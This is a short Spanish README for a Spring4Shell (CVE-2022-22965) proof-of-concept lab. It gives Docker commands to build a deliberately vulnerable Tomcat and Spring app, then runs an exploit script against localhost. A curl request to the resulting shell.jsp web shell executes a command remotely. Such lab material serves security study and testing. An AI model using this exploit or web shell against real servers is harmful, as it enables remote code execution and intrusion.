
PoC y exploit para CVE-2022-22965 Spring4Shell
Spring4Shell (CVE-2022-22965) Prueba de Concepto con un servidor Tomcat vulnerable y una aplicación spring4shell vulnerable.
docker build . -t spring4shell
docker run -p 80:8080 spring4shell
También puedes ejecutarlo con el puerto del depurador expuesto si es necesario:
docker run -p 80:8080 –p 5005:5005 spring4shell
¡Consulta el artículo original del blog para obtener detalles sobre cómo configurar un depurador remoto en IntelliJ Idea!
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell
Luego, puedes ejecutar cualquier comando de forma remota así:
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -
...o visitando la URL anterior.